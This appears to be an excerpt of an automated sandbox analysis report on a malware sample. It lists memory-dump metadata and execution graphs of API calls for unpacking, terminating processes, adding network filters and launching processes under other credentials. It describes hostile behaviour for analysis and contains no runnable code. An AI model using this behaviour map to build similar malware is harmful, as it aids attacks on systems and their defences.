                    • String ID: csm
                    • API String ID: 3242871069-1018135373
                    APIs
                    • _CallSETranslator.LIBVCRUNTIME ref: 037A17E1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CallTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3163161869-2084237596
                    APIs
                    • __except_validate_context_record.LIBVCRUNTIME ref: 037A28A0
                    • _CreateFrameInfo.LIBVCRUNTIME ref: 037A28C9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2049758717.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: CreateFrameInfo__except_validate_context_record
                    • String ID: csm
                    • API String ID: 2558813199-1018135373

                    Execution Graph

                    Execution Coverage:59.2%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:11
                    Total number of Limit Nodes:1
                    execution_graph 89 3790650 90 3790665 89->90 95 3790620 VirtualAlloc 90->95 92 37906d0 96 37901b0 VirtualAlloc 92->96 95->92 97 379023b VirtualProtect 96->97 99 3790321 VirtualFree 97->99 102 379030c 97->102 100 3790347 VirtualFree VirtualAlloc 99->100 100->102 101 3790531 102->101 103 37904f9 VirtualProtect 102->103 103->102

                    Control-flow Graph

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.4538050567.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: Virtual$AllocFreeProtect
                    • String ID:
                    • API String ID: 267585107-0

                    Control-flow Graph

                    control_flow_graph 34 3790620-3790644 VirtualAlloc
                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.4538050567.0000000003790000.00000040.00001000.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3790000_ET5.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                    • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                    • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                    • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2415672602.00007FF6FF591000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FF590000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_7ff6ff590000_j5ql5xzpbrfk9lvkq57d8xjw55zyt.jbxd

                    Execution Graph

                    Execution Coverage:6.8%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.1%
                    Total number of Nodes:1714
                    Total number of Limit Nodes:10
7ff704898d8a 9330->9332 9334 7ff704891c73 8 API calls 9330->9334 9333 7ff704898da9 FreeLibrary 9332->9333 9332->9336 9333->9336 9335 7ff704898dc6 9334->9335 9335->9336 9337 7ff704891c73 8 API calls 9335->9337 9336->9019 9338 7ff704898de3 9337->9338 9338->9336 9339 7ff704891c73 8 API calls 9338->9339 9340 7ff704898e00 9339->9340 9340->9336 9341 7ff704891c73 8 API calls 9340->9341 9350 7ff704898e18 9341->9350 9342 7ff70489a1f1 11 API calls 9342->9350 9343 7ff704898ecc strlen 9343->9350 9344 7ff704898f64 GetProcessHeap HeapAlloc 9344->9350 9345 7ff704898fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9345->9350 9346 7ff7048914e2 6 API calls 9346->9350 9348 7ff7048990f2 GetProcessHeap HeapFree 9348->9350 9349 7ff7048991dc LocalFree 9349->9350 9350->9332 9350->9336 9350->9342 9350->9343 9350->9344 9350->9345 9350->9346 9350->9348 9350->9349 9497 7ff70489795a GetProcessHeap HeapAlloc 9350->9497 9352 7ff704899bd1 9351->9352 9353 7ff704899bec 9351->9353 9354 7ff704899c1f 9352->9354 9355 7ff704899bd6 9352->9355 9356 7ff7048914e2 6 API calls 9353->9356 9358 7ff7048914e2 6 API calls 9354->9358 9357 7ff704899c52 9355->9357 9364 7ff704899bdb 9355->9364 9363 7ff704899c15 9356->9363 9359 7ff7048914e2 6 API calls 9357->9359 9358->9363 9359->9363 9360 7ff704899cbc 9362 7ff704899cc3 9360->9362 9360->9363 9361 7ff704899c91 strcmp 9361->9364 9365 7ff7048914e2 6 API calls 9362->9365 9366 7ff7048914e2 6 API calls 9363->9366 9364->9360 9364->9361 9367 7ff704899689 9365->9367 9366->9367 9367->9022 9367->9027 9367->9292 9369 7ff70489a200 9368->9369 9370 7ff70489a22c 9368->9370 9381 7ff70489a0f0 9369->9381 9372 7ff7048914e2 6 API calls 9370->9372 9373 7ff70489a217 9372->9373 9373->9296 9375 7ff70489932b 9374->9375 9376 7ff70489937a 9374->9376 9377 7ff7048914e2 6 API calls 9375->9377 9380 7ff70489934f 9375->9380 9378 7ff7048914e2 6 API calls 9376->9378 9377->9380 9379 7ff70489952d 9378->9379 9380->9296 9382 7ff70489a112 9381->9382 9383 7ff70489a153 9381->9383 9393 7ff704899ed0 9382->9393 
9384 7ff7048914e2 6 API calls 9383->9384 9388 7ff70489a12b 9384->9388 9387 7ff70489a183 _errno 9389 7ff7048a0568 9387->9389 9388->9373 9390 7ff70489a1a5 _errno 9389->9390 9390->9388 9391 7ff70489a1b4 _errno 9390->9391 9392 7ff7048914e2 6 API calls 9391->9392 9392->9388 9394 7ff704899ee1 9393->9394 9395 7ff704899f19 9393->9395 9397 7ff704899bb9 7 API calls 9394->9397 9396 7ff7048914e2 6 API calls 9395->9396 9400 7ff704899ef8 9396->9400 9398 7ff704899ef4 9397->9398 9398->9400 9401 7ff704899d40 9398->9401 9400->9387 9400->9388 9402 7ff704899d73 9401->9402 9403 7ff704899d58 9401->9403 9406 7ff7048914e2 6 API calls 9402->9406 9404 7ff704899da6 9403->9404 9405 7ff704899d5d 9403->9405 9408 7ff7048914e2 6 API calls 9404->9408 9407 7ff704899dd9 9405->9407 9413 7ff704899d62 9405->9413 9415 7ff704899d9c 9406->9415 9409 7ff7048914e2 6 API calls 9407->9409 9408->9415 9409->9415 9410 7ff704899e3b 9412 7ff704899e44 9410->9412 9410->9415 9411 7ff704899e18 strcmp 9411->9413 9414 7ff7048914e2 6 API calls 9412->9414 9413->9410 9413->9411 9416 7ff704899e69 9414->9416 9417 7ff7048914e2 6 API calls 9415->9417 9416->9400 9417->9416 9441 7ff704898008 GetFileAttributesW 9418->9441 9420 7ff70489817c 9421 7ff704898192 wcslen 9420->9421 9438 7ff704898182 9420->9438 9458 7ff704897102 9421->9458 9423 7ff7048981aa 9424 7ff7048982b9 FwpmFilterAdd0 9423->9424 9425 7ff704898239 FwpmFilterDeleteByKey0 9423->9425 9426 7ff704898461 9424->9426 9427 7ff7048984ce FwpmFilterAdd0 9424->9427 9428 7ff704898277 FwpmFilterDeleteByKey0 9425->9428 9429 7ff70489825a 9425->9429 9430 7ff7048914e2 6 API calls 9426->9430 9431 7ff704898540 9427->9431 9432 7ff704898474 9427->9432 9434 7ff70489829c 9428->9434 9428->9438 9433 7ff7048914e2 6 API calls 9429->9433 9430->9432 9437 7ff7048914e2 6 API calls 9431->9437 9435 7ff7048984a1 9432->9435 9436 7ff70489848a GetProcessHeap HeapFree 9432->9436 9433->9438 9439 7ff7048914e2 6 API calls 9434->9439 9435->9438 9440 7ff7048984b2 GetProcessHeap HeapFree 9435->9440 9436->9435 
9437->9432 9438->9310 9439->9438 9440->9438 9442 7ff704898028 9441->9442 9443 7ff704898149 9441->9443 9464 7ff704897e04 9442->9464 9445 7ff70489803b 9446 7ff70489804f GetProcessHeap HeapAlloc 9445->9446 9456 7ff704898041 9445->9456 9447 7ff7048980d9 9446->9447 9452 7ff704898071 9446->9452 9449 7ff7048914e2 6 API calls 9447->9449 9448 7ff70489807b wcslen GetProcessHeap HeapAlloc 9450 7ff7048980f7 9448->9450 9451 7ff7048980bb 9448->9451 9449->9452 9453 7ff7048914e2 6 API calls 9450->9453 9454 7ff70489810f 9451->9454 9455 7ff7048980c7 memcpy 9451->9455 9452->9448 9452->9456 9453->9451 9454->9456 9457 7ff704898114 GetProcessHeap HeapFree 9454->9457 9455->9456 9456->9420 9457->9456 9459 7ff70489710b 9458->9459 9460 7ff70489711d 9458->9460 9462 7ff704897110 9459->9462 9463 7ff7048914e2 6 API calls 9459->9463 9461 7ff7048914e2 6 API calls 9460->9461 9461->9462 9462->9423 9463->9462 9465 7ff704897e59 9464->9465 9466 7ff704897e6f QueryDosDeviceW 9465->9466 9471 7ff704897e5f 9465->9471 9467 7ff704897e90 GetLastError 9466->9467 9468 7ff704897f6c 9466->9468 9469 7ff7048914e2 6 API calls 9467->9469 9472 7ff704897de7 9468->9472 9469->9471 9471->9445 9475 7ff70489b270 9472->9475 9476 7ff70489b295 9475->9476 9477 7ff70489b27e 9475->9477 9479 7ff70489dadd fputwc fwprintf _errno 9476->9479 9478 7ff70489dadd fputwc fwprintf _errno 9477->9478 9480 7ff704897dff 9478->9480 9479->9480 9480->9471 9482 7ff704891d02 LoadLibraryA 9481->9482 9483 7ff704891d2b 9481->9483 9484 7ff704891d10 9482->9484 9485 7ff704891d2e GetLastError 9482->9485 9483->9485 9486 7ff7048914e2 6 API calls 9484->9486 9487 7ff7048914e2 6 API calls 9485->9487 9488 7ff704891d29 9486->9488 9487->9488 9488->9330 9489 7ff704891c73 9488->9489 9490 7ff704891c90 GetProcAddress 9489->9490 9491 7ff704891cc1 9489->9491 9492 7ff704891ca1 9490->9492 9493 7ff704891cc6 GetLastError 9490->9493 9491->9493 9494 7ff7048914e2 6 API calls 9492->9494 9495 7ff7048914e2 6 API calls 9493->9495 9496 7ff704891cbf 9494->9496 9495->9496 9496->9330 
9498 7ff704897c4f 9497->9498 9499 7ff7048979a1 9497->9499 9501 7ff7048914e2 6 API calls 9498->9501 9500 7ff704897102 6 API calls 9499->9500 9503 7ff7048979b1 9500->9503 9502 7ff704897c3b 9501->9502 9502->9350 9504 7ff704897a46 9503->9504 9505 7ff704897c6c FwpmFilterDeleteByKey0 9503->9505 9510 7ff704897b20 FwpmFilterAdd0 9504->9510 9506 7ff704897ca7 FwpmFilterDeleteByKey0 9505->9506 9507 7ff704897c8d 9505->9507 9506->9502 9509 7ff704897cd2 9506->9509 9508 7ff7048914e2 6 API calls 9507->9508 9508->9502 9511 7ff7048914e2 6 API calls 9509->9511 9512 7ff704897cef FwpmFilterAdd0 9510->9512 9513 7ff704897c07 9510->9513 9511->9502 9515 7ff704897d5d 9512->9515 9514 7ff7048914e2 6 API calls 9513->9514 9516 7ff704897c1a 9514->9516 9517 7ff7048914e2 6 API calls 9515->9517 9516->9502 9518 7ff704897c24 GetProcessHeap HeapFree 9516->9518 9519 7ff704897d7a 9517->9519 9518->9502 10057 7ff70489212f 10058 7ff7048921b6 10057->10058 10059 7ff704892159 CreateToolhelp32Snapshot 10057->10059 10062 7ff7048914e2 6 API calls 10058->10062 10060 7ff704892175 Process32First 10059->10060 10061 7ff704892227 GetLastError 10059->10061 10063 7ff7048922ff GetLastError 10060->10063 10086 7ff7048921a6 10060->10086 10064 7ff7048914e2 6 API calls 10061->10064 10071 7ff7048921df 10062->10071 10065 7ff70489230c 10063->10065 10064->10071 10066 7ff7048914e2 6 API calls 10065->10066 10066->10086 10067 7ff7048921f4 10072 7ff7048914e2 6 API calls 10067->10072 10068 7ff7048928a3 10078 7ff7048914e2 6 API calls 10068->10078 10069 7ff704892888 CloseHandle 10069->10068 10069->10071 10071->10067 10071->10068 10073 7ff704892211 10072->10073 10074 7ff7048924d3 OpenProcess 10076 7ff7048925a3 GetLastError 10074->10076 10077 7ff7048924f4 TerminateProcess 10074->10077 10075 7ff7048924c2 strcmp 10075->10074 10075->10086 10082 7ff7048914e2 6 API calls 10076->10082 10080 7ff704892484 CloseHandle 10077->10080 10081 7ff70489250a GetLastError 10077->10081 10078->10073 10079 7ff7048926ed Process32Next 10083 7ff704892704 
GetLastError 10079->10083 10079->10086 10080->10086 10084 7ff7048914e2 6 API calls 10081->10084 10082->10086 10083->10086 10084->10086 10085 7ff7048914e2 6 API calls 10085->10086 10086->10069 10086->10074 10086->10075 10086->10079 10086->10080 10086->10085 11182 7ff70489702f 11183 7ff704897057 wcslen 11182->11183 11184 7ff70489704b 11182->11184 11183->11184 11185 7ff70489dc2f 11186 7ff70489dc62 11185->11186 11187 7ff70489dc56 11185->11187 11188 7ff70489cacd 10 API calls 11186->11188 11189 7ff70489ccd9 2 API calls 11187->11189 11193 7ff70489db86 11188->11193 11189->11193 11190 7ff70489e2e0 11191 7ff70489e301 11190->11191 11192 7ff70489ccd9 2 API calls 11190->11192 11192->11191 11193->11190 11194 7ff70489ccd9 fputwc fwprintf 11193->11194 11195 7ff70489d1bd fputwc 11193->11195 11194->11193 11195->11193 10467 7ff70489c631 10470 7ff70489c64d 10467->10470 10468 7ff70489b5da fputc 10475 7ff70489c382 10468->10475 10469 7ff70489c6c3 10469->10468 10470->10469 10471 7ff70489c6c8 10470->10471 10476 7ff70489bdaf 10471->10476 10473 7ff70489ca67 10474 7ff70489b3e7 fputc 10474->10475 10475->10473 10475->10474 10477 7ff70489bdc6 10476->10477 10478 7ff70489bf5e 10477->10478 10484 7ff70489b3e7 fputc 10477->10484 10479 7ff70489bf9d 10478->10479 10480 7ff70489b3e7 fputc 10478->10480 10481 7ff70489b3e7 fputc 10479->10481 10480->10479 10482 7ff70489bfaa 10481->10482 10483 7ff70489b3e7 fputc 10482->10483 10486 7ff70489bfbb 10483->10486 10484->10477 10485 7ff70489c008 10490 7ff70489c054 10485->10490 10491 7ff70489b3e7 fputc 10485->10491 10487 7ff70489bfc1 10486->10487 10488 7ff70489b3e7 fputc 10486->10488 10487->10485 10489 7ff70489b64c 11 API calls 10487->10489 10493 7ff70489b3e7 fputc 10487->10493 10495 7ff70489b420 5 API calls 10487->10495 10488->10486 10489->10487 10492 7ff70489b3e7 fputc 10490->10492 10491->10485 10494 7ff70489c068 10492->10494 10493->10487 10495->10487 11200 7ff70489c436 11201 7ff70489c44b 11200->11201 11202 7ff70489c48e 11200->11202 11204 7ff70489c475 wcslen 
11201->11204 11205 7ff70489c46e 11201->11205 11203 7ff70489b593 strlen 11202->11203 11209 7ff70489c382 11203->11209 11204->11205 11206 7ff70489b420 5 API calls 11205->11206 11206->11209 11207 7ff70489ca67 11208 7ff70489b3e7 fputc 11208->11209 11209->11207 11209->11208 10496 7ff70489de28 10497 7ff70489de3e 10496->10497 10505 7ff70489d126 10497->10505 10499 7ff70489e2e0 10500 7ff70489e301 10499->10500 10501 7ff70489ccd9 2 API calls 10499->10501 10501->10500 10502 7ff70489db86 10502->10499 10503 7ff70489ccd9 fputwc fwprintf 10502->10503 10504 7ff70489d1bd fputwc 10502->10504 10503->10502 10504->10502 10506 7ff70489d137 10505->10506 10507 7ff70489d00f 6 API calls 10506->10507 10508 7ff70489d164 10507->10508 10509 7ff70489d186 10508->10509 10510 7ff70489d179 10508->10510 10512 7ff70489cdd0 9 API calls 10509->10512 10511 7ff70489cc00 10 API calls 10510->10511 10515 7ff70489d184 10511->10515 10513 7ff70489d191 10512->10513 10514 7ff70489ca90 fputwc 10513->10514 10513->10515 10514->10513 10515->10502 11210 7ff70489ac27 11211 7ff70489ac4e 11210->11211 11212 7ff70489acdf signal 11211->11212 11213 7ff70489acb5 11211->11213 11215 7ff70489ac6f 11211->11215 11212->11213 11212->11215 11214 7ff70489acfb signal 11213->11214 11213->11215 11214->11215 10094 7ff70489292e 10095 7ff704892944 10094->10095 10096 7ff704892a53 10095->10096 10097 7ff70489299e 10095->10097 10098 7ff7048914e2 6 API calls 10096->10098 10099 7ff704892a87 10097->10099 10100 7ff7048929a7 10097->10100 10107 7ff7048929d5 10098->10107 10101 7ff7048914e2 6 API calls 10099->10101 10102 7ff704892abb 10100->10102 10103 7ff7048929bd strlen 10100->10103 10101->10107 10104 7ff7048914e2 6 API calls 10102->10104 10105 7ff704892aef strcat 10103->10105 10103->10107 10104->10107 10106 7ff704892b08 strlen strlen 10105->10106 10111 7ff704892bec 10105->10111 10106->10107 10108 7ff704892b38 strlen strcat 10106->10108 10117 7ff7048914e2 6 API calls 10107->10117 10132 7ff7048931b1 10107->10132 10109 7ff704892b74 10108->10109 10110 
7ff704892b95 strlen strlen 10109->10110 10109->10111 10110->10111 10113 7ff704892bbc strlen strcat 10110->10113 10111->10107 10126 7ff704892c1a 10111->10126 10127 7ff704893032 10111->10127 10112 7ff704893041 CreateProcessA 10115 7ff704893191 10112->10115 10116 7ff704893098 GetLastError 10112->10116 10113->10109 10114 7ff704892c32 LogonUserA 10118 7ff704892c63 GetLastError 10114->10118 10119 7ff704892d9d CreateProcessAsUserA 10114->10119 10125 7ff7048914e2 6 API calls 10115->10125 10121 7ff7048914e2 6 API calls 10116->10121 10124 7ff704892a3c 10117->10124 10120 7ff7048914e2 6 API calls 10118->10120 10122 7ff704892dfc GetLastError 10119->10122 10123 7ff704892eed 10119->10123 10120->10126 10121->10127 10128 7ff7048914e2 6 API calls 10122->10128 10129 7ff7048914e2 6 API calls 10123->10129 10125->10132 10126->10114 10133 7ff704892ce5 10126->10133 10127->10107 10127->10112 10128->10133 10129->10133 10130 7ff704892f27 CloseHandle 10131 7ff704892f2d 10130->10131 10131->10107 10134 7ff704892f36 10131->10134 10133->10130 10133->10131 10134->10132 10135 7ff7048914e2 6 API calls 10134->10135 10135->10124 10841 7ff70489ff1f GetModuleHandleW GetProcAddress 10842 7ff70489ff73 10841->10842 10843 7ff70489ff4c LoadLibraryW GetProcAddress 10841->10843 10843->10842 10523 7ff704893222 10524 7ff704893230 WaitForSingleObject 10523->10524 10525 7ff70489325c 10523->10525 10526 7ff70489328c GetLastError 10524->10526 10529 7ff704893240 10524->10529 10527 7ff7048914e2 6 API calls 10525->10527 10528 7ff7048914e2 6 API calls 10526->10528 10527->10529 10528->10529 10847 7ff7048a0721 DeleteCriticalSection 10136 7ff704895923 10137 7ff7048959d4 10136->10137 10138 7ff704895936 10136->10138 10141 7ff7048914e2 6 API calls 10137->10141 10139 7ff70489593f CreateFileA 10138->10139 10140 7ff704895a04 10138->10140 10143 7ff704895a34 GetLastError 10139->10143 10144 7ff70489597c GetFileSize 10139->10144 10142 7ff7048914e2 6 API calls 10140->10142 10147 7ff7048959b4 10141->10147 10142->10147 10148 
7ff70489599b 10143->10148 10145 7ff704895afa GetLastError 10144->10145 10144->10148 10145->10148 10146 7ff7048959ab CloseHandle 10146->10147 10148->10146 10148->10147 10530 7ff70489f626 10531 7ff70489f63b DeleteCriticalSection 10530->10531 10532 7ff70489f65d 10530->10532 10531->10532 10533 7ff704891a19 10534 7ff704891b02 10533->10534 10535 7ff704891a32 10533->10535 10538 7ff7048914e2 6 API calls 10534->10538 10536 7ff704891a3b FindResourceA 10535->10536 10537 7ff704891b2d 10535->10537 10539 7ff704891b58 GetLastError 10536->10539 10540 7ff704891a58 LoadResource 10536->10540 10541 7ff7048914e2 6 API calls 10537->10541 10548 7ff704891af2 10538->10548 10544 7ff7048914e2 6 API calls 10539->10544 10542 7ff704891a70 10540->10542 10543 7ff704891b86 GetLastError GetLastError 10540->10543 10541->10548 10546 7ff7048914e2 6 API calls 10542->10546 10545 7ff7048914e2 6 API calls 10543->10545 10547 7ff704891b79 10544->10547 10545->10548 10546->10548 10547->10543 10547->10548 10548->10548 10851 7ff70489131a 10852 7ff704891131 152 API calls 10851->10852 10853 7ff70489132e 10852->10853 11234 7ff70489181b 11235 7ff7048917b9 11234->11235 11236 7ff7048914e2 6 API calls 11235->11236 11237 7ff7048917d6 11236->11237 10156 7ff70489c51b 10157 7ff70489c52d 10156->10157 10162 7ff70489bbb4 10157->10162 10159 7ff70489ca67 10160 7ff70489b3e7 fputc 10161 7ff70489c382 10160->10161 10161->10159 10161->10160 10163 7ff70489bbe6 10162->10163 10165 7ff70489bd06 10163->10165 10169 7ff70489b3e7 fputc 10163->10169 10164 7ff70489bd86 10166 7ff70489bda2 10164->10166 10168 7ff70489b3e7 fputc 10164->10168 10165->10164 10167 7ff70489b3e7 fputc 10165->10167 10166->10161 10167->10165 10168->10164 10169->10163 11238 7ff70489341c 11239 7ff7048934ad 11238->11239 11240 7ff70489342e GetExitCodeProcess 11238->11240 11241 7ff7048914e2 6 API calls 11239->11241 11242 7ff70489350f GetLastError 11240->11242 11243 7ff704893444 11240->11243 11246 7ff7048934d6 11241->11246 11244 7ff7048914e2 6 API calls 11242->11244 11245 
7ff704893452 WaitForSingleObject GetExitCodeProcess 11243->11245 11243->11246 11249 7ff7048935f9 TerminateProcess 11243->11249 11244->11246 11247 7ff7048936f1 GetLastError 11245->11247 11248 7ff704893476 11245->11248 11251 7ff7048937ac 11246->11251 11253 7ff7048914e2 6 API calls 11246->11253 11250 7ff7048914e2 6 API calls 11247->11250 11260 7ff7048933c0 11248->11260 11249->11245 11255 7ff70489360a GetLastError 11249->11255 11250->11246 11259 7ff7048934ab 11253->11259 11257 7ff7048914e2 6 API calls 11255->11257 11256 7ff704893484 11258 7ff7048914e2 6 API calls 11256->11258 11257->11243 11258->11259 11261 7ff7048933ec 11260->11261 11262 7ff7048933ce CloseHandle CloseHandle 11260->11262 11264 7ff7048914e2 6 API calls 11261->11264 11263 7ff7048933e5 11262->11263 11263->11246 11263->11256 11264->11263 10549 7ff70489a650 10550 7ff70489a659 10549->10550 10551 7ff70489a662 10550->10551 10553 7ff70489aebd 10550->10553 10554 7ff70489aecb 10553->10554 10556 7ff70489aed3 10553->10556 10555 7ff70489aee1 10554->10555 10554->10556 10558 7ff70489aed1 10554->10558 10555->10556 10557 7ff70489aeeb InitializeCriticalSection 10555->10557 10556->10551 10557->10556 10558->10556 10559 7ff70489af37 DeleteCriticalSection 10558->10559 10560 7ff70489af29 free 10558->10560 10559->10556 10560->10558 10561 7ff70489ae48 10562 7ff70489aeb4 10561->10562 10563 7ff70489ae5a EnterCriticalSection 10561->10563 10565 7ff70489ae73 10563->10565 10564 7ff70489aeab LeaveCriticalSection 10564->10562 10565->10564 10566 7ff70489ae98 free 10565->10566 10566->10564 10175 7ff70489354e 10176 7ff7048934db 10175->10176 10177 7ff7048937ac 10176->10177 10178 7ff7048914e2 6 API calls 10176->10178 10179 7ff704893505 10178->10179 11276 7ff704895c44 11277 7ff704895c60 11276->11277 11286 7ff704895cdf 11276->11286 11278 7ff704895c79 CreateFileA 11277->11278 11280 7ff704895d24 11277->11280 11281 7ff704895cb2 GetFileTime 11278->11281 11282 7ff704895ccc GetLastError 11278->11282 11279 7ff7048914e2 6 API calls 11288 7ff704895d1a 
11279->11288 11283 7ff7048914e2 6 API calls 11280->11283 11281->11282 11284 7ff704895d57 11281->11284 11282->11284 11285 7ff704895cd9 11282->11285 11283->11288 11287 7ff704895deb CloseHandle 11284->11287 11284->11288 11285->11284 11285->11286 11286->11279 11287->11288 11289 7ff70489e045 11291 7ff70489db86 11289->11291 11290 7ff70489e2e0 11292 7ff70489e301 11290->11292 11293 7ff70489ccd9 2 API calls 11290->11293 11291->11290 11294 7ff70489ccd9 fputwc fwprintf 11291->11294 11295 7ff70489d1bd fputwc 11291->11295 11293->11292 11294->11291 11295->11291 10187 7ff704892d71 10188 7ff704892f1c 10187->10188 10189 7ff704892f27 CloseHandle 10188->10189 10190 7ff704892f2d 10188->10190 10189->10190 10191 7ff704892f36 10190->10191 10192 7ff7048929db 10190->10192 10193 7ff7048931b6 10191->10193 10194 7ff7048914e2 6 API calls 10191->10194 10192->10193 10195 7ff7048914e2 6 API calls 10192->10195 10196 7ff704892a3c 10194->10196 10195->10196 11300 7ff70489a072 11301 7ff70489a0b6 11300->11301 11302 7ff70489a08c 11300->11302 11303 7ff7048914e2 6 API calls 11301->11303 11306 7ff704899f70 11302->11306 11305 7ff70489a0a3 11303->11305 11307 7ff704899fd7 11306->11307 11308 7ff704899f9b 11306->11308 11310 7ff7048914e2 6 API calls 11307->11310 11309 7ff704899ed0 8 API calls 11308->11309 11311 7ff704899fae 11309->11311 11312 7ff704899fb4 11310->11312 11311->11312 11313 7ff70489a007 _errno 11311->11313 11312->11305 11314 7ff7048a0560 11313->11314 11315 7ff70489a029 _errno 11314->11315 11315->11312 11316 7ff70489a034 _errno 11315->11316 11317 7ff7048914e2 6 API calls 11316->11317 11317->11312 10587 7ff7048a0671 HeapFree 10588 7ff7048ab608 10587->10588 10876 7ff704896776 10877 7ff7048967fb 10876->10877 10878 7ff70489678c 10876->10878 10881 7ff7048914e2 6 API calls 10877->10881 10879 7ff704896795 10878->10879 10880 7ff70489682e 10878->10880 10882 7ff70489685e 10879->10882 10883 7ff70489679e 10879->10883 10884 7ff7048914e2 6 API calls 10880->10884 10899 7ff704896824 10881->10899 10885 7ff7048914e2 6 
API calls 10882->10885 10886 7ff7048967aa ExpandEnvironmentStringsA 10883->10886 10887 7ff70489688e 10883->10887 10884->10899 10885->10899 10889 7ff704896909 GetLastError 10886->10889 10890 7ff7048967bb 10886->10890 10888 7ff7048914e2 6 API calls 10887->10888 10888->10899 10894 7ff7048914e2 6 API calls 10889->10894 10892 7ff7048967c9 10890->10892 10893 7ff7048969dc 10890->10893 10891 7ff704896a51 10896 7ff7048914e2 6 API calls 10892->10896 10897 7ff7048914e2 6 API calls 10893->10897 10894->10899 10895 7ff7048914e2 6 API calls 10898 7ff7048967f1 10895->10898 10896->10898 10897->10899 10899->10891 10899->10895 11348 7ff70489dc75 11349 7ff70489dc8a 11348->11349 11350 7ff70489dccd 11348->11350 11352 7ff70489dcb4 wcslen 11349->11352 11353 7ff70489dcad 11349->11353 11351 7ff70489cfc8 strlen 11350->11351 11359 7ff70489db86 11351->11359 11352->11353 11354 7ff70489ccd9 2 API calls 11353->11354 11354->11359 11355 7ff70489e2e0 11356 7ff70489e301 11355->11356 11357 7ff70489ccd9 2 API calls 11355->11357 11357->11356 11358 7ff70489ccd9 fputwc fwprintf 11358->11359 11359->11355 11359->11358 11360 7ff70489d1bd fputwc 11359->11360 11360->11359 11377 7ff704894c69 11378 7ff704894be8 11377->11378 11379 7ff704894d5a 11378->11379 11380 7ff704894c0a 11378->11380 11381 7ff7048914e2 6 API calls 11379->11381 11382 7ff7048914e2 6 API calls 11380->11382 11383 7ff704894d7c 11381->11383 11384 7ff704894c20 11382->11384 11383->11383 10909 7ff70489a369 10910 7ff70489a378 10909->10910 10911 7ff70489a3a7 10909->10911 10915 7ff70489a264 10910->10915 10912 7ff7048914e2 6 API calls 10911->10912 10914 7ff70489a390 10912->10914 10916 7ff70489a286 10915->10916 10917 7ff70489a2c9 10915->10917 10918 7ff704899ed0 8 API calls 10916->10918 10919 7ff7048914e2 6 API calls 10917->10919 10920 7ff70489a299 10918->10920 10921 7ff70489a29f 10919->10921 10920->10921 10922 7ff70489a2f9 _errno _strtoui64 _errno 10920->10922 10921->10914 10922->10921 10923 7ff70489a32c _errno 10922->10923 10924 7ff7048914e2 6 API calls 
10923->10924 10924->10921 10589 7ff70489a66c 10590 7ff70489a67e 10589->10590 10591 7ff70489a693 10590->10591 10592 7ff70489aebd 3 API calls 10590->10592 10592->10591 10197 7ff704896d60 10198 7ff704896d6f 10197->10198 10199 7ff704896d82 10197->10199 10200 7ff704896d74 10198->10200 10201 7ff704896db5 10198->10201 10202 7ff7048914e2 6 API calls 10199->10202 10203 7ff704896d79 10200->10203 10205 7ff7048914e2 6 API calls 10200->10205 10204 7ff7048914e2 6 API calls 10201->10204 10202->10203 10204->10203 10205->10203 10206 7ff704891d60 10207 7ff704891e23 10206->10207 10208 7ff704891d77 10206->10208 10211 7ff7048914e2 6 API calls 10207->10211 10209 7ff704891d80 OpenProcessToken 10208->10209 10210 7ff704891e53 10208->10210 10213 7ff704891eb8 GetLastError 10209->10213 10214 7ff704891d98 GetTokenInformation 10209->10214 10212 7ff7048914e2 6 API calls 10210->10212 10232 7ff704891e21 10211->10232 10212->10232 10217 7ff7048914e2 6 API calls 10213->10217 10215 7ff704891fcd 10214->10215 10216 7ff704891dce GetLastError 10214->10216 10218 7ff704892090 LocalAlloc 10215->10218 10221 7ff7048920cb 10215->10221 10219 7ff704891de0 10216->10219 10220 7ff704891f67 LocalAlloc 10216->10220 10217->10232 10218->10221 10222 7ff7048920a8 GetLengthSid memcpy 10218->10222 10224 7ff7048914e2 6 API calls 10219->10224 10220->10221 10225 7ff704891f82 GetTokenInformation 10220->10225 10222->10221 10223 7ff7048914e2 6 API calls 10226 7ff704891ead 10223->10226 10227 7ff704891df6 10224->10227 10225->10218 10228 7ff704891fac GetLastError 10225->10228 10229 7ff704891e05 LocalFree 10227->10229 10230 7ff704891e0e CloseHandle 10227->10230 10231 7ff7048914e2 6 API calls 10228->10231 10229->10230 10230->10226 10230->10232 10231->10215 10232->10223 10233 7ff70489c562 10234 7ff70489c566 10233->10234 10238 7ff70489c382 10234->10238 10239 7ff70489b9b0 10234->10239 10236 7ff70489ca67 10237 7ff70489b3e7 fputc 10237->10238 10238->10236 10238->10237 10246 7ff70489ba02 10239->10246 10240 7ff70489bb66 10241 7ff70489bb7f 
